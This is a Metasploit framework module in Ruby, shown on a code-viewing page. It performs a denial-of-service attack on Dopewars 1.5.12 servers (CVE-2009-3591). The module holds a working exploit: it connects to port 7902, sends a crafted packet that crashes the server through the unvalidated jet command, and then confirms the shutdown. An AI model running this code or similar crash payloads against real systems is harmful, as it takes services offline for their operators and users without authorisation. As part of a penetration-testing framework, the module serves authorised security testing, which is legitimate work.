Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/dos/misc/dopewars.rb
Views: 11623
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(update_info(info,11'Name' => 'Dopewars Denial of Service',12'Description' => %q{13The jet command in Dopewars 1.5.12 is vulnerable to a segmentation fault due to14a lack of input validation.15},16'Author' => [ 'Doug Prostko <dougtko[at]gmail.com>' ],17'License' => MSF_LICENSE,18'References' =>19[20[ 'CVE', '2009-3591' ],21[ 'OSVDB', '58884' ],22[ 'BID', '36606' ]23],24'DisclosureDate' => '2009-10-05' ))2526register_options([Opt::RPORT(7902)])27end2829def run30# The jet command is vulnerable.31# Program received signal SIGSEGV, Segmentation fault.32# [Switching to Thread 0xb74916c0 (LWP 30638)]33# 0x08062f6e in HandleServerMessage (buf=0x8098828 "", Play=0x809a000) at34# serverside.c:52535# 525 dopelog(4, LF_SERVER, "%s jets to %s",36#37connect38pkt = "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"39print_status("Sending dos packet...")40sock.put(pkt)41disconnect4243print_status("Checking for success...")44select(nil, nil, nil, 2)45begin46connect47rescue ::Interrupt48raise $!49rescue ::Rex::ConnectionRefused50print_good("Dopewars server successfully shut down!")51else52print_error("DOS attack unsuccessful")53ensure54disconnect55end56end57end585960